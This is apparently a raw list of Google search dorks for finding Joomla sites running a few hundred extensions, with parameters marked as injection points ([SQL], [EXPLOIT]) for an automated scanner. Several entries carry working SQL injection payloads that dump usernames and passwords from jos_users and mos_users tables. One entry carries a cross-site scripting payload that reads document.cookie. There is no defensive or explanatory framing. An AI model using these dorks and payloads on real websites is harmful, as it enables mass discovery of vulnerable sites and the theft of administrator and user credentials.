inurl:index.php?option=com_musicgallery:@!query:option=com_musicgallery&task=itempage&id=ish
inurl:index.php?option=com_quicknews:@!query:option=com_quicknews&task=view_item&newsid=ish
inurl:index.php?option=com_joaktree:@!query:option=com_joaktree&view=joaktree&treeId=ish
inurl:index.php?option=com_job:@!query:option=com_job&task=showMoreUser&id=ish
inurl:index.php?option=com_rokdownloads:@!query:option=com_rokdownloads&view=file&task=download&id=ish
inurl:index.php?option=com_jphoto:@!query:option=com_jphoto&view=category&id=ish
inurl:index.php?option=com_virtuemart:@!query:option=com_virtuemart&Itemid=ish
inurl:index.php?option=com_content:@!query:option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=ish
inurl:index.php?option=com_jbook:@!query:option=com_jbook&Itemid=ish
inurl:index.php?option=com_acmisc:@!query:option=com_acmisc&page=5&Itemid=ish
inurl:index.php?option=com_zcalendar:@!query:option=com_zcalendar&task=view&vmode=e&eid=ish
inurl:index.php?option=com_content:@!query:option=com_content&view=article&id=ish
inurl:index.php?option=com_content:@!query:option=com_content&task=view&id=36&Itemid=ish
inurl:index.php?option=com_jeemaarticlecollection
:@!query:option=ish
inurl:index.php?option=com_schools:@!query:option=com_schools&Itemid=89&schoolid=ish
inurl:index.php?option=com_beeheard:@!query:option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=ish
inurl:index.php?option=com_dhforum:@!query:option=com_dhforum&view=grouplist&id=ish
inurl:index.php?option=com_materialsuche:@!query:option=com_materialsuche&Itemid=ish
inurl:index.php?option=com_calendario
:@!query:option=ish
inurl:index.php?option=com_kkcontent:@!query:option=com_kkcontent&catID=ish
inurl:index.php?option=com_airmonoblock:@!query:option=com_airmonoblock&task=focus&id=ish
inurl:index.php?option=com_portfol:@!query:option=com_portfol&Itemid=814&task=viewcategory&vcatid=ish
inurl:index.php?option=com_mdigg". #
:@!query:option=ish
inurl:index.php?option=com_avosbillets:@!query:option=com_avosbillets&task=view&view=event&id=ish
inurl:index.php?option=com_bfsurvey_pro:@!query:option=com_bfsurvey_pro&view=bfsurveypro&catid=ish
inurl:index.php?option=com_countries:@!query:option=com_countries&locat=ish
inurl:index.php?option=com_alfresco:@!query:option=com_alfresco&task=edit&id_pan=ish
inurl:index.php?option=com_hotbrackets:@!query:option=com_hotbrackets&id=ish
inurl:index.php?option=com_doqment:@!query:option=com_doqment&cid=ish
inurl:index.php?option=com_content:@!query:option=com_content&view=article&id=ish
inurl:index.php?option=com_j-projects:@!query:option=com_j-projects&Itemid=102&cat=5&task=projects&project=ish
inurl:index.php?option=com_perchagallery:@!query:option=com_perchagallery&view=editunidad&id=ish
inurl:index.php?option=com_jembed:@!query:option=com_jembed&task=summary&catid=ish
inurl:index.php?option=com_kk:@!query:option=com_kk&kat=ish
inurl:index.php?option=com_king:@!query:option=com_king&Itemid=0&task=show&id_k=ish
inurl:index.php?option=com_tophotelmodule:@!query:option=com_tophotelmodule&task=showhoteldetails&id=ish
inurl:index.php?option=com_ksadvertiser:@!query:option=com_ksadvertiser&pid=[EXPLOIT]&task=ish
inurl:index.php?option=com_articlemanager:@!query:option=com_articlemanager&Itemid=349&task=display&artid=ish
inurl:index.php?option=com_virtuemart
:@!query:option=ish
inurl:index.php?option=com_libros:@!query:option=com_libros&task=detail&Itemid=ish
inurl:index.php?option=com_avosbillets:@!query:option=com_avosbillets&task=view&view=event&id=ish
inurl:index.php?option=com_gurujibook:@!query:option=com_gurujibook&task=showPDF&bookid=ish
inurl:index.php?option=com_biographies:@!query:option=com_biographies&task=showFile&biobookid=ish
inurl:index.php?option=com_contentbloglist:@!query:option=com_contentbloglist&task=listmonth&year=2010&month=1&section_id=[SQL]&Itemid=ish
https://github.com/Ishanoshada/GDorks/
inurl:index.php?option=com_casino:@!query:option=com_casino&task=category&id=ish
inurl:index.php?option=com_kunena:@!query:option=com_kunena&Itemid=86&func=announcement&do=ish
inurl:index.php?option=com_content:@!query:option=com_content&view=article&id=ish
inurl:index.php?option=com_jequizmanagement:@!query:option=com_jequizmanagement&view=question&eid=[SQL]&Itemid=ish
inurl:index.php?option=com_content:@!query:option=com_content&view=article&id=41&Itemid=ish
inurl:index.php?option=com_jeeventcalendar:@!query:option=com_jeeventcalendar&view=event&Itemid=155&event_id=ish
inurl:index.php?option=com_job:@!query:option=com_job&controller=listcategory&task=viewJob&id_job=ish
inurl:index.php?option=com_yelp:@!query:option=com_yelp&controller=showdetail&task=showdetail&cid=ish
inurl:index.php?option=com_photoblog:@!query:option=com_photoblog&view=images&category=1&celebs&blog=ish
inurl:index.php?option=com_productbook:@!query:option=com_productbook&Itemid=ish
inurl:index.php?option=com_acnews:@!query:option=com_acnews&task=view&id=ish
inurl:index.php?option=com_acstartseite:@!query:option=com_acstartseite&Itemid=null[SQL]&#9001;=ish
inurl:index.php?option=com_acprojects:@!query:option=com_acprojects&page=7&Itemid=[SQL]&lang=ish
inurl:index.php?option=com_acteammember:@!query:option=com_acteammember&id=[SQL]&Itemid=121&lang=ish
inurl:index.php?option=com_liveticker "viewticker" ]
:@!query:option=ish
inurl:index.php?option=com_hezacontent:@!query:option=com_hezacontent&view=item&id=ish
inurl:index.php?option=com_blog:@!query:option=com_blog&task=viewdetails&id=ish
inurl:index.php?option=com_gigfe:@!query:option=com_gigfe&task=style&styletype=ish
inurl:index.php?option=com_color:@!query:option=com_color&view=color&l=ish
inurl:index.php?option=com_party:@!query:option=com_party&view=party&task=details&id=ish
inurl:index.php?option=com_start:@!query:option=com_start&task=main&mitID=ish
inurl:index.php?option=com_leader:@!query:option=com_leader&Itemid=ish
inurl:index.php?option=com_family:@!query:option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=ish
inurl:index.php?option=com_comp:@!query:option=com_comp&task=view&cid=ish
inurl:index.php?option=com_include:@!query:option=com_include&lang=en_GB&Itemid=50&ID_NLE=ish
inurl:index.php?option=com_ckforms:@!query:option=com_ckforms&controller=ish
inurl:index.php?option=com_vxdate:@!query:option=com_vxdate&ct=ish
inurl:index.php?option=com_flash:@!query:option=com_flash&sid=ish
inurl:index.php?option=com_wallpapers:@!query:option=com_wallpapers&act=albums&cid=ish
inurl:index.php?option=com_software:@!query:option=com_software&task=viewDetail&software_id=ish
inurl:index.php?option=com_dcs_flashgames:@!query:option=com_dcs_flashgames&Itemid=kaMtiEz&catid=ish
inurl:index.php?option=com_solution:@!query:option=com_solution&Itemid=5&task=contry&con=ish
inurl:index.php?option=com_adds:@!query:option=com_adds&action=view&catid=ish
inurl:index.php?option=com_tariff:@!query:option=com_tariff&detail=ish
inurl:index.php?option=com_agency:@!query:option=com_agency&task=view&aid=ish
inurl:index.php?option=com_teacher:@!query:option=com_teacher&view=teacher&id=ish
inurl:index.php?option=com_science:@!query:option=com_science&view=science&id=ish
inurl:index.php?option=com_topmenu:@!query:option=com_topmenu&id=ish
inurl:index.php?option=com_personal:@!query:option=com_personal&pid=ish
inurl:index.php?option=com_units:@!query:option=com_units&task=unit&id=ish
inurl:index.php?option=com_departments:@!query:option=com_departments&id=ish
inurl:index.php?option=com_business:@!query:option=com_business&view=business&region=37&category_id=ish
inurl:index.php?option=com_radio:@!query:option=com_radio&task=exibi_descricao&id=ish
inurl:index.php?option=com_guide:@!query:option=com_guide&season=ish
inurl:index.php?option=com_spec:@!query:option=com_spec&view=spec&tmpl=component&pro_id=ish
inurl:index.php?option=com_television:@!query:option=com_television&view=television&id=ish
inurl:index.php?option=com_items:@!query:option=com_items&parent=ish
inurl:index.php?option=com_actions:@!query:option=com_actions&actionid=ish
inurl:index.php?option=com_actions:@!query:option=com_actions&actionid=ish
inurl:index.php?option=com_network:@!query:option=com_network&act=customer&task=details&cid=ish
inurl:index.php?option=com_tour:@!query:option=com_tour&view=cat&cid=ish
inurl:index.php?option=com_trading:@!query:option=com_trading&task=showsharedetails&id=ish
inurl:index.php?option=com_menu:@!query:option=com_menu&id=ish
inurl:index.php?option=com_ops:@!query:option=com_ops&view=location&location_id=ish
inurl:index.php?option=com_football:@!query:option=com_football&task=viewteams&leagueID=ish
inurl:index.php?option=com_press:@!query:option=com_press&task=view_details&id=ish
inurl:index.php?option=com_serie:@!query:option=com_serie&Itemid=126&menu=show_spieler&spielerid=ish
inurl:index.php?option=com_ranking:@!query:option=com_ranking&view=detail&id=ish
inurl:index.php?option=com_fss:@!query:option=com_fss&view=faq&Itemid=4&catid=1&tmpl=component&faqid=ish
inurl:index.php?option=com_xobbix:@!query:option=com_xobbix&catid=32&task=prod_desc&prodid=ish
inurl:index.php?option=com_articles:@!query:option=com_articles&task=view_addarticles&sid=ish
inurl:index.php?option=com_awdwall:@!query:option=com_awdwall&controller=ish
inurl:index.php?option=com_properties:@!query:option=com_properties&task=agentlisting&aid=ish
inurl:index.php?option=com_ca:@!query:option=com_ca&id=[SQL &#304;NJECT&#304;ON]:!
inurl:index.php?option=com_rokmodule:@!query:option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=ish
inurl:index.php?option=com_mv_restaurantmenumanager:@!query:option=com_mv_restaurantmenumanager&task=menu_display&Venue=XX&mid=XX&Itemid=ish
inurl:index.php?option=com_mv_restaurantmenumanager
:@!query:option=ish
inurl:index.php?option=com_jdrugstopics:@!query:option=com_jdrugstopics&view=drugsdetails&id=ish
inurl:index.php?option=com_sermonspeaker:@!query:option=com_sermonspeaker&task=latest_sermons&id=ish
inurl:index.php?option=com_remository:@!query:option=com_remository&Itemid=6&func=fileinfo&id=6&#9001;=ish
inurl:index.php?option=com_jp_jobs:@!query:option=com_jp_jobs&view=detail&id=ish
inurl:index.php?option=com_qpersonel:@!query:option=com_qpersonel&task=qpListele&katid=ish
inurl:index.php?option=com_mediamall:@!query:option=com_mediamall&category=ish
inurl:index.php?option=com_iproperty:@!query:option=com_iproperty&view=agentproperties&id=ish
inurl:index.php?option=com_manager:@!query:option=com_manager&view=flight&Itemid=ish
inurl:index.php?option=com_joltcard:@!query:option=com_joltcard&Itemid=XX&task=view&cardID=ish
inurl:index.php?option=com_pandafminigames:@!query:option=com_pandafminigames&Itemid=&task=myscores&userid=ish
inurl:index.php?option=com_gbufacebook:@!query:option=com_gbufacebook&task=show_face&face_id=ish
inurl:index.php?option=com_jnewspaper:@!query:option=com_jnewspaper&cid=ish
inurl:index.php?option=com_jtm:@!query:option=com_jtm&view=search&view=search&author=ish
inurl:index.php?option=com_abc:@!query:option=com_abc&view=abc&letter=AS&sectionid=ish
inurl:index.php?option=com_newsfeeds:@!query:option=com_newsfeeds&view=categories&feedid=ish
inurl:index.php?option=com_konsultasi:@!query:option=com_konsultasi&act=detail&sid=ish
inurl:index.php?option=com_dioneformwizard:@!query:option=com_dioneformwizard&controller=ish
inurl:index.php?option=com_jejob:@!query:option=com_jejob&view=ish
inurl:index.php?option=com_camp:@!query:option=com_camp&task=show&cid=ish
inurl:index.php?option=com_crowdsource:@!query:option=com_crowdsource&view=design&cid=ish
inurl:index.php?option=com_event:@!query:option=com_event&task=view&id=ish
inurl:index.php?option=com_packages:@!query:option=com_packages&func=detail&Itemid=ish
inurl:index.php?option=com_qpersonel:@!query:option=com_qpersonel&task=qpListele&katid=ish
inurl:index.php?option=com_mycar:@!query:option=com_mycar&task=1&pagina=0&ordine=preveh&modveh=ish
inurl:index.php?option=com_bfquiztrial:@!query:option=com_bfquiztrial&view=bfquiztrial&catid=[SQL Injection]&Itemid=ish
inurl:index.php?option=com_jepoll:@!query:option=com_jepoll&view=poll_graph&task=pollgraph&pollid=ish
inurl:index.php?option=com_jejob:@!query:option=com_jejob&view=item&catid=ish
inurl:index.php?option=com_bfquiztrial:@!query:option=com_bfquiztrial&view=bfquiztrial&catid=ish
inurl:index.php?option=com_quran:@!query:option=com_quran&action=viewayat&surano=ish
inurl:index.php?option=com_rokdownloads:@!query:option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=ish
inurl:index.php?option=com_chronoconnectivity" / "com_chronoconnectivity"
:@!query:option=ish
inurl:index.php?option=com_chronocontact" / "com_chronocontact"
:@!query:option=ish
inurl:index.php?option=com_lead:@!query:option=com_lead&task=display&archive=1&Itemid=65&leadstatus=ish
inurl:index.php?option=com_djartgallery:@!query:option=com_djartgallery&task=ish
inurl:index.php?option=com_searchlog:@!query:option=com_searchlog&act=ish
inurl:index.php?option=com_jstore:@!query:option=com_jstore&controller=product-display&task=ish
inurl:index.php?option=com_jtickets:@!query:option=com_jtickets&controller=ticket&task=ish
inurl:index.php?option=com_jcommunity:@!query:option=com_jcommunity&controller=members&task=ish
inurl:index.php?option=com_jmarket:@!query:option=com_jmarket&controller=product&task=ish
inurl:index.php?option=com_jsubscription:@!query:option=com_jsubscription&controller=subscription&task=ish
inurl:index.php?option=com_jstore:@!query:option=com_jstore&controller=product-display&task=ish
inurl:index.php?option=com_remository:@!query:option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=ish
inurl:index.php?option=com_yanc:@!query:option=com_yanc&Itemid=9999999&listid=ish
inurl:index.php?option=com_philaform:@!query:option=com_philaform&form_id=ish
inurl:index.php?option=com_remository:@!query:option=com_remository&func=selectcat&cat=ish
inurl:index.php?option=com_eventlist:@!query:option=com_eventlist&func=details&did=ish
inurl:index.php?option=com_mambads:@!query:option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=ish
inurl:index.php?option=com_rsgallery:@!query:option=com_rsgallery&page=inline&catid=ish
inurl:index.php?option=com_newsletter:@!query:option=com_newsletter&Itemid=S@BUN&listid=ish
inurl:index.php?option=com_fq:@!query:option=com_fq&Itemid=S@BUN&listid=ish
inurl:index.php?option=com_mamml:@!query:option=com_mamml&listid=ish
inurl:index.php?option=com_glossary:@!query:option=com_glossary&func=display&Itemid=s@bun&catid=ish
inurl:index.php?option=com_musepoes:@!query:option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=ish
inurl:index.php?option=com_recipes:@!query:option=com_recipes&Itemid=ish
inurl:index.php?option=com_jokes:@!query:option=com_jokes&Itemid=S@BUN&func=CatView&cat=ish
inurl:index.php?option=com_estateagent:@!query:option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=ish
inurl:index.php?option=com_akogallery:@!query:option=com_akogallery&Itemid=ish
inurl:index.php?option=com_catalogshop:@!query:option=com_catalogshop&Itemid=ish
inurl:index.php?option=com_restaurant:@!query:option=com_restaurant&Itemid=ish
inurl:index.php?option=com_neoreferences:@!query:option=com_neoreferences&Itemid=27&catid=ish
inurl:index.php?option=com_virtuemart:@!query:option=com_virtuemart&Itemid=ish
inurl:index.php?option=com_awesom:@!query:option=com_awesom&Itemid=S@BUN&task=viewlist&listid=ish
inurl:index.php?option=com_shambo2:@!query:option=com_shambo2&Itemid=ish
inurl:index.php?option=com_downloads:@!query:option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=ish
inurl:index.php?option=com_sermon:@!query:option=com_sermon&gid=ish
inurl:index.php?option=com_noticias:@!query:option=com_noticias&Itemid=ish
inurl:index.php?option=com_neogallery:@!query:option=com_neogallery&task=show&Itemid=5&catid=ish
inurl:index.php?option=com_gallery:@!query:option=com_gallery&Itemid=ish
inurl:index.php?option=com_comments:@!query:option=com_comments&task=view&id=ish
inurl:index.php?option=com_pcchess:@!query:option=com_pcchess&Itemid=S@BUN&page=players&user_id=ish
inurl:index.php?option=com_xfaq:@!query:option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=ish
inurl:index.php?option=com_paxxgallery:@!query:option=com_paxxgallery&Itemid=85&gid=7&userid=ish
inurl:index.php?option=com_mcquiz:@!query:option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=ish
inurl:index.php?option=com_quiz:@!query:option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=ish
inurl:index.php?option=com_mediaslide:@!query:option=com_mediaslide&act=contact&id=1&albumnum=ish
inurl:index.php?option=com_jooget:@!query:option=com_jooget&Itemid=ish
inurl:index.php?option=com_ricette:@!query:option=com_ricette&Itemid=ish
inurl:index.php?option=com_galeria:@!query:option=com_galeria&Itemid=ish
inurl:index.php?option=com_pccookbook:@!query:option=com_pccookbook&page=viewuserrecipes&user_id=ish
inurl:index.php?option=com_clasifier:@!query:option=com_clasifier&Itemid=S@BUN&cat_id=ish
inurl:index.php?option=com_hwdvideoshare:@!query:option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=ish
inurl:index.php?option=com_simpleshop:@!query:option=com_simpleshop&Itemid=S@BUN&cmd=section&section=ish
inurl:index.php?option=com_garyscookbook:@!query:option=com_garyscookbook&Itemid=ish
inurl:index.php?option=com_musica:@!query:option=com_musica&Itemid=ish
inurl:index.php?option=com_candle:@!query:option=com_candle&task=content&cID=ish
inurl:index.php?option=com_ewriting:@!query:option=com_ewriting&Itemid=9999&func=selectcat&cat=ish
inurl:index.php?option=com_productshowcase:@!query:option=com_productshowcase&Itemid=ish
inurl:index.php?option=com_acajoom:@!query:option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=ish
inurl:index.php?option=com_joovideo:@!query:option=com_joovideo&Itemid=ish
inurl:index.php?option=com_alberghi:@!query:option=com_alberghi&task=detail&Itemid=ish
inurl:index.php?option=com_accombo:@!query:option=com_accombo&func=detail&Itemid=ish
inurl:index.php?option=com_restaurante:@!query:option=com_restaurante&task=detail&Itemid=ish
inurl:index.php?option=com_rekry:@!query:option=com_rekry&Itemid=xX&rekryview=view&op_id=ish
inurl:index.php?option=com_d3000:@!query:option=com_d3000&task=showarticles&id=ish
inurl:index.php?option=com_cinema:@!query:option=com_cinema&Itemid=ish
inurl:index.php?option=com_alphacontent:@!query:option=com_alphacontent&section=6&cat=15&task=view&id=ish
inurl:index.php?option=com_myalbum:@!query:option=com_myalbum&album=ish
inurl:index.php?option=com_ahsshop:@!query:option=com_ahsshop&do=default&vara=ish
inurl:index.php?option=com_actualite:@!query:option=com_actualite&task=edit&id=ish
inurl:index.php?option=com_comprofiler:@!query:option=com_comprofiler&task=userProfile&user=ish
inurl:index.php?option=com_jpad:@!query:option=com_jpad&task=edit&Itemid=39&cid=ish
inurl:index.php?option=com_prayercenter:@!query:option=com_prayercenter&task=view_request&id=ish
inurl:index.php?option=com_biblestudy:@!query:option=com_biblestudy&view=mediaplayer&id=ish
inurl:index.php?option=com_mycontent:@!query:option=com_mycontent&task=view&id=ish
inurl:index.php?option=com_joobb:@!query:option=com_joobb&view=forum&forum=ish
inurl:index.php?option=com_acctexp:@!query:option=com_acctexp&task=subscribe&usage=ish
inurl:index.php?option=com_equotes:@!query:option=com_equotes&id=ish
inurl:index.php?option=com_joomradio:@!query:option=com_joomradio&page=show_radio&id=ish
inurl:index.php?option=com_idoblog:@!query:option=com_idoblog&task=userblog&userid=ish
inurl:index.php?option=com_jb2:@!query:option=com_jb2&view=category&CategoryID=ish
inurl:index.php?option=com_jotloader:@!query:option=com_jotloader&cid=ish
inurl:index.php?option=com_easybook:@!query:option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=ish
inurl:index.php?option=com_simpleshop:@!query:option=com_simpleshop&task=browse&Itemid=29&catid=ish
inurl:index.php?option=com_joomladate:@!query:option=com_joomladate&task=viewProfile&user=ish
inurl:index.php?option=com_gameq:@!query:option=com_gameq&task=page&category_id=ish
inurl:index.php?option=com_yvcomment:@!query:option=com_yvcomment&view=comment&ArticleID=ish
inurl:index.php?option=com_rapidrecipe:@!query:option=com_rapidrecipe&page=viewrecipe&recipe_id=ish
inurl:index.php?option=com_news_portal" or "Powered by iJoomla News Portal":@!query:option=ish
inurl:index.php?option=com_galleries:@!query:option=com_galleries&id=10&aid=ish
inurl:index.php?option=com_simpleshop:@!query:option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=ish
inurl:index.php?option=com_expshop:@!query:option=com_expshop&page=show_payment&catid=ish
inurl:index.php?option=com_netinvoice:@!query:option=com_netinvoice&action=orders&task=order&cid=ish
inurl:index.php?option=com_jabode:@!query:option=com_jabode&task=sign&sign=taurus&id=ish
inurl:index.php?option=com_beamospetition:@!query:option=com_beamospetition&pet=ish
inurl:index.php?option=com_xewebtv:@!query:option=com_xewebtv&Itemid=ish
inurl:index.php?option=com_n-gallery:@!query:option=com_n-gallery&flokkur=ish
inurl:index.php?option=com_brightweblinks:@!query:option=com_brightweblinks&Itemid=58&catid=ish
inurl:index.php?option=com_content:@!query:option=com_content&task=blogcategory&id=60&Itemid=ish
inurl:index.php?option=com_n-forms:@!query:option=com_n-forms&form_id=ish
inurl:index.php?option=com_dtregister:@!query:option=com_dtregister&eventId=ish
inurl:index.php?option=com_ezstore:@!query:option=com_ezstore&Itemid=ish
inurl:index.php?option=com_content:@!query:option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=ish
inurl:index.php?option=com_hotspots:@!query:option=com_hotspots&task=w&w=ish
inurl:index.php?option=com_joomtracker:@!query:option=com_joomtracker&task=tordetails&id=ish
inurl:index.php?option=com_ignitegallery:@!query:option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=ish
inurl:index.php?option=com_mad4joomla:@!query:option=com_mad4joomla&jid=ish
inurl:index.php?option=com_ownbiblio:@!query:option=com_ownbiblio&view=catalogue&catid=ish
inurl:index.php?option=com_dailymessage:@!query:option=com_dailymessage&Itemid=ish
inurl:index.php?option=com_kbase:@!query:option=com_kbase&view=article&id=ish
inurl:index.php?option=com_books:@!query:option=com_books&task=book_details&book_id=ish
inurl:index.php?option=com_contactinfo:@!query:option=com_contactinfo&catid=ish
inurl:index.php?option=com_catalogproduction:@!query:option=com_catalogproduction&task=viewdetail&id=ish
inurl:index.php?option=com_marketplace:@!query:option=com_marketplace&page=show_category&catid=ish
inurl:index.php?option=com_jmovies:@!query:option=com_jmovies&Itemid=ish
inurl:index.php?option=com_hbssearch:@!query:option=com_hbssearch&task=showhoteldetails&id=1&r_type=ish
inurl:index.php?option=com_tophotelmodule:@!query:option=com_tophotelmodule&task=showhoteldetails&id=ish
inurl:index.php?option=com_volunteer:@!query:option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=ish
inurl:index.php?option=com_ice:@!query:option=com_ice&catid=ish
inurl:index.php?option=com_liveticker:@!query:option=com_liveticker&task=viewticker&tid=ish
inurl:index.php?option=com_mdigg:@!query:option=com_mdigg&act=story_lists&task=view&category=ish
inurl:index.php?option=com_5starhotels:@!query:option=com_5starhotels&task=showhoteldetails&id=ish
inurl:index.php?option=com_paxgallery:@!query:option=com_paxgallery&task=table&gid=ish
inurl:index.php?option=com_na_content:@!query:option=com_na_content&task=view&id=ish
inurl:index.php?option=com_na_newsdescription:@!query:option=com_na_newsdescription&task=show&groupId=17377_19&newsid=ish
inurl:index.php?option=com_phocadocumentation:@!query:option=com_phocadocumentation&view=section&id=ish
inurl:index.php?option=com_xevidmegahd:@!query:option=com_xevidmegahd&Itemid=99999999&func=viewcategory&catid=ish
inurl:index.php?option=com_jashowcase:@!query:option=com_jashowcase&view=jashowcase&Itemid=109&catid=ish
inurl:index.php?option=com_newsflash:@!query:option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=ish
inurl:index.php?option=com_portfol:@!query:option=com_portfol&Itemid=814&task=viewcategory&vcatid=ish
inurl:index.php?option=com_gigcal:@!query:option=com_gigcal&task=details&gigcal_gigs_id=ish
inurl:index.php?option=com_camelcitydb2:@!query:option=com_camelcitydb2&id=[SQL]&view=detail&Itemid=ish
inurl:index.php?option=com_fantasytournament:@!query:option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=ish
inurl:index.php?option=com_eventing:@!query:option=com_eventing&catid=ish
inurl:index.php?option=com_rdautos:@!query:option=com_rdautos&view=category&id=[SQL]&Itemid=ish
inurl:index.php?option=com_gigcal:@!query:option=com_gigcal&Itemid=ish
inurl:index.php?option=com_pccookbook:@!query:option=com_pccookbook&page=viewrecipe&recipe_id=ish
inurl:index.php?option=com_news:@!query:option=com_news&id=ish
inurl:index.php?option=com_waticketsystem:@!query:option=com_waticketsystem&act=category&catid=ish
inurl:index.php?option=com_prod:@!query:option=com_prod&task=products&cid=ish
inurl:index.php?option=com_pcchess:@!query:option=com_pcchess&Itemid=84&page=showgame&game_id=ish
inurl:index.php?option=com_sim:@!query:option=com_sim&task=viewchar&character_ID=ish
inurl:index.php?option=com_flashmagazinedeluxe:@!query:option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=ish
inurl:index.php?option=com_digistore:@!query:option=com_digistore&task=show_product&pid=ish
inurl:index.php?option=com_ijoomla_archive:@!query:option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=ish
inurl:index.php?option=com_virtuemart:@!query:option=com_virtuemart&vmcchk=1&DescOrderBy=ish
inurl:index.php?option=com_virtuemart:@!query:option=com_virtuemart&:!
inurl:index.php?option=com_maianmusic:@!query:option=com_maianmusic&section=category&category=[SQL]&Itemid=ish
inurl:index.php?option=com_mailto:@!query:option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=ish
inurl:index.php?option=com_gsticketsystem:@!query:option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=ish
inurl:index.php?option=com_content:@!query:option=com_content&task=view&id=7&Itemid=ish
inurl:index.php?option=com_casino_blackjack:@!query:option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=ish
inurl:index.php?option=com_agoragroup:@!query:option=com_agoragroup&con=groupdetail&id=ish
inurl:index.php?option=com_jvideo:@!query:option=com_jvideo&view=user&user_id=ish
inurl:index.php?option=com_juser:@!query:option=com_juser&task=show_profile&id=ish
inurl:index.php?option=com_seminar:@!query:option=com_seminar&task=View_seminar&id=ish
inurl:index.php?option=com_mosres:@!query:option=com_mosres&task=viewproperty&property_uid=ish
inurl:index.php?option=com_school:@!query:option=com_school&Itemid=null&func=showclass&classid=ish
inurl:index.php?option=com_portafolio:@!query:option=com_portafolio&task=viewcat&cid=ish
inurl:index.php?option=com_ijoomla_rss:@!query:option=com_ijoomla_rss&act=xml&cat=ish
inurl:index.php?option=com_jumi:@!query:option=com_jumi&fileid=ish
inurl:index.php?option=com_tickets:@!query:option=com_tickets&task=form&id=ish
inurl:index.php?option=com_amocourse:@!query:option=com_amocourse&task=view&view=category&catid=ish
inurl:index.php?option=com_pinboard:@!query:option=com_pinboard&Itemid=35&action=showpic&task=ish
inurl:index.php?option=com_php:@!query:option=com_php&Itemid=ish
inurl:index.php?option=com_k2:@!query:option=com_k2&view=itemlist&category=ish
inurl:index.php?option=com_bookflip:@!query:option=com_bookflip&book_id=ish
inurl:index.php?option=com_propertylab:@!query:option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=ish
inurl:index.php?option=com_category:@!query:option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--:!
inurl:index.php?option=com_joomloads:@!query:option=com_joomloads&view=package&Itemid=2&packageId=ish
inurl:index.php?option=com_aclassf:@!query:option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=ish
inurl:index.php?option=com_jfusion:@!query:option=com_jfusion&Itemid=ish
inurl:index.php?option=com_idoblog:@!query:option=com_idoblog&task=profile&Itemid=1337&userid=ish
inurl:index.php?option=com_misterestate:@!query:option=com_misterestate&act=mesearch&task=showMESR&tmpl=ish
inurl:index.php?option=com_ninjacentral:@!query:option=com_ninjacentral&page=show_package&id=56&Itemid=ish
inurl:index.php?option=com_jtips:@!query:option=com_jtips&Itemid=1&task=ladder&season=ish
inurl:index.php?option=com_siirler:@!query:option=com_siirler&task=sdetay&sid=ish
inurl:index.php?option=com_digifolio:@!query:option=com_digifolio&view=project&id=ish
inurl:index.php?option=com_artportal:@!query:option=com_artportal&portalid=ish
inurl:index.php?option=com_gameserver:@!query:option=com_gameserver&view=gamepanel&id=ish
inurl:index.php?option=com_zoom:@!query:option=com_zoom&Itemid=0&catid=ish
inurl:index.php?option=com_joomlub:@!query:option=com_joomlub&controller=auction&view=auction&task=edit&aid=ish
inurl:index.php?option=com_tpdugg:@!query:option=com_tpdugg&task=tags&id=ish
inurl:index.php?option=com_joomloc:@!query:option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=ish
inurl:index.php?option=com_hestar:@!query:option=com_hestar&task=showlist&id=ish
inurl:index.php?option=com_hbssearch:@!query:option=com_hbssearch&task=showhoteldetails&id=118&adult=2<script>alert(document.cookie);</script>&child=0&r_type=1&chkin=2009-09-15&chkout=2009-09-16&datedif=1&str_day=Tue&end_day=Wed&start_day=Tue&star=ish
inurl:index.php?option=com_user:@!query:option=com_user&view=reset&tmpl=ish
inurl:index.php?option=com_djcatalog:@!query:option=com_djcatalog&view=showItem&id=ish
inurl:index.php?option=com_foobla_suggestions:@!query:option=com_foobla_suggestions&controller=comment&idea_id=ish
inurl:index.php?option=com_jlord_rss:@!query:option=com_jlord_rss&task=feed&id=ish
inurl:index.php?option=com_content:@!query:option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=ish
inurl:index.php?option=com_digistore:@!query:option=com_digistore&task=list_products&id=1&Itemid=ish
inurl:index.php?option=com_tupinambis:@!query:option=com_tupinambis&task=verproyecto&proyecto=ish
inurl:index.php?option=com_facebook:@!query:option=com_facebook&view=student&id=ish
inurl:index.php?option=com_jshop:@!query:option=com_jshop&view=product&family=INDONESIANCODER&group=0&pid=ish
inurl:index.php?option=com_photoblog:@!query:option=com_photoblog&view=blogs&category=
